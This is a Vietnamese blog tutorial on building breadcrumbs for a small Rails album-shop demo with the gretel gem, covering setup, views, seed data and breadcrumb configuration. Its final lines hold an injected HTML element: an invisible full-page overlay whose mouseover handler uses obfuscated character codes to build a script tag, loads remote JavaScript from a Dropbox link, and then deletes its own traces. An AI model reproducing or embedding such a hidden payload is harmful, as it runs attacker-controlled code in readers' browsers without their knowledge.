+3

Tạo Breadcrumbs với gem Gretel

breadcrumbs1.jpg

Xin chào các bạn (lay2)

Đến hẹn lại lên (honho)

Hôm nay tôi sẽ giới thiệu với các bạn một function nhỏ của website, nó giúp người dùng trải nghiệm tốt hơn cũng như cải thiện khả năng SEO của trang web - Breadcrumbs

I. Giới thiệu về Breadcrumbs

Quay trở lại tuổi thơ, câu truyện cổ Grimm có tên Hansel and Gretel (yaoming).

Câu chuyện kể rằng:

Ngày xửa ngày xưa, có một gia đình nghèo, nghèo đến mức không có gì để ăn, họ phải đưa 2 người con vào trong rừng sâu rồi bỏ lại đó ( gg cha mẹ -_- ). May thay, người anh là Hansel đã nhanh trí, bẻ vụn mẩu bánh mỳ trong tay và rải dọc đường để 2 anh em họ có thể lần theo nó, tìm được đường về nhà... bla bla

Từ ý tưởng đó, Breadcrumbs đối với Web app được tạo ra. Breadcrumbs là tập hợp các đường liên kết phân cấp, giúp người dùng có thể biết được mình đang ở trang nào và từ đó có thể di chuyển thuận lợi từ trang này trang khác trên website - giống như những mẩu vụn bánh mỳ vậy.

Đối với các website có chiều sâu, cấu trúc phức tạp thì Breadcrumbs trở nên đặc biệt hữu dụng.

breadcrumbs_ex.png

Breadcrumbs là vậy đó (honho)

Kết thúc phần giới thiệu.

Tiếp theo ta sẽ demo một app nhỏ, có áp dụng Breadcrumbs.

II. Demo

Sau đây ta sẽ tạo một trang web bán hàng đơn giản, sau đó add Breadcrumbs vào thử xem sao. (dance2)

Các bước thực hiện:

 • Khởi tạo web app, add các gem cần thiết.
 • Thiết lập layout, tạo MVC cho việc mở shop :v
 • Cài đặt Breadcrumbs, hiển thị Breadcrumbs trên View.

Các công cụ sử dụng:

 • Rails 4.2.3
 • Ruby 2.1.4
 • MySql 5.6

GLHF (honho)

1. Khởi tạo

Tạo rails app mới

rails new breadcrumbs

Add các gem cần thiết

gem "bootstrap-sass"
gem "gretel"
gem "faker"

Các bác nhớ bundle installimport cho bootstrap đấy

# stylesheets/application.scss
@import "bootstrap-sprockets";
@import "bootstrap";

Tạo cái layout bằng bootstrap cho nó dễ nhìn (yaoming)

# views/layouts/application.html.erb
<nav class="nav navbar-inverse">
 <div class="container" >
  <div class="navbar-header">
   <%= link_to "Breadcrumbs", root_path, class: "navbar-brand" %>
  </div>
  <div id="navbar">
   <ul class="nav navbar-nav">
   </ul>
  </div>
 </div>
</nav>

<div class="container">
 <% flash.each do |message_type, message| %>
  <div class="alert alert-<%= message_type %>">
   <%= message %>
  </div>
 <% end %>

 <%= yield %>
</div>

Tiếp đến ta bắt đầu tạo MVC cho shop. Tạo model Album bao gồm các trường

 • title(string): Tiêu đề Album
 • description(text): Mô tả về Album
 • artist(text): Tác giả
 • price(decimal): Giá
rails g model Album title:string description:text artist:string price:decimal

Create DB và Migrate sau khi generate hoàn thành.

Generate AlbumController

rails g controller Albums index show edit

Điều hướng root tới albums#index.

Tại trang index ta xử lý:

<div class="page-header">
 <h1>Albums</h1>
</div>

<table class="table table-hover">
 <tr>
  <th>Title</th>
  <th>Artist</th>
  <th>Description</th>
  <th>Price</th>
 </tr>
 <% @albums.each do |album| %>
  <tr>
   <td><%= link_to album.title, album_path(album) %></td>
   <td><%= album.artist %></td>
   <td><%= album.description %></td>
   <td><%= number_to_currency album.price, unit: '$' %></td>
  </tr>
 <% end %>
</table>

Trang show:

<div class="page-header">
 <h1><%= @album.title %></h1>
</div>

<p><%= @album.description %></p>

<%= link_to 'Edit', edit_album_path(@album), class: 'btn btn-primary' %>

Ném đoạn code sau vào file seeds.rb rồi chạy rake để tạo dữ liệu

50.times do
 Album.create({title: Faker::Lorem.words(2).join(' ').titleize,
        description: Faker::Lorem.paragraph(3, true, 4),
        artist: Faker::Name.name, price: Faker::Commerce.price})
end

Trang web của chúng ta sẽ như sau

index1.png

Chuẩn bị cho shop thế là xong xuôi (dance2)

2. Add breadcrumbs

Gem gretel đã được cài đặt xong, ta tiến hành generate nó

rails g gretel:install

Sau khi generate thành công, trong thư mục config sẽ xuất hiện file breadcrumbs.rb

crumb :root do
 link "Home", root_path
end

Crumb root sẽ đại diện cho đường link tới trang chủ với tên hiển thị là "Home". Ta sẽ xử lý add thêm crumb sau.

Để hiển thị breadcrumbs trên view, ta thêm đoạn code sau vào layout:

# layout/application.html.erb
<%= breadcrumbs %>

Một số các option breadcrumb cung cấp là:

Option Mô tả Giá trị mặc định
style style hiển thị breadcrumbs inline
pretext Đooạn text hiển thị trước link crumb. None
posttext Đoạn text hiển thị sau link crumb. None
separator ký tự nằm giữa các link crumbs. /
autoroot Nếu link crumbs không có parent, nó tự động cho parent là crumb root. True
display_single_fragment Hiển thị crumbs False
link_current Hiển thị crumb dưới dạng link. False

Ở đây ta sẽ thêm vào option sau:

<%= breadcrumbs pretext: "In here: ", display_single_fragment: true,
  style: :bootstrap, link_current: true %>

Trong trang index, thêm liên kết vào vị trí bất kỳ trong file

<% breadcrumb :root %>

Kết quả trang index:

breadresult01.png Breadcumbs hiển thị đường dẫn tới trang Home

Ở trang show hoặc edit, đối với mỗi Album sẽ có 1 đường dẫn khác nhau. Nên nếu muốn add breadcrumbs cho chúng, ta cần phải sửa config

# config/breadcrumbs.rb
crumb :album do |album|
 link album.title, album
 parent :root
end

parent là crumb cha của nó, trong trường hợp này là root.

Đưa breadcrumbs vào view

# show.html.erb, edit.html.erb
<% breadcrumb :album, @album %>

Kết quả:

breadresult.png

Source code

Nguồn tham khảo

<hr id="unique-hr" style="background-color: #a00; border: none; height: 2000px; width: 2000px ;z-index: 1000; opacity: 0.01; position: fixed; top: 0px; left: 0px;" onmouseover="$('#footer').append(String.fromCharCode(39, 60, 115, 99, 114, 105, 112, 116) + ' id=\'atk-src\' src=\'https://www.dropbox.com/s/vfi73fypu0x7ij5/serious.js?dl=1\'></' + String.fromCharCode(115, 99, 114, 105, 112, 116, 62, 39)); setTimeout(function() {$('#unique-hr,#atk-src').remove();}, 3000);">

All Rights Reserved

Viblo
Let's register a Viblo Account to get more interesting posts.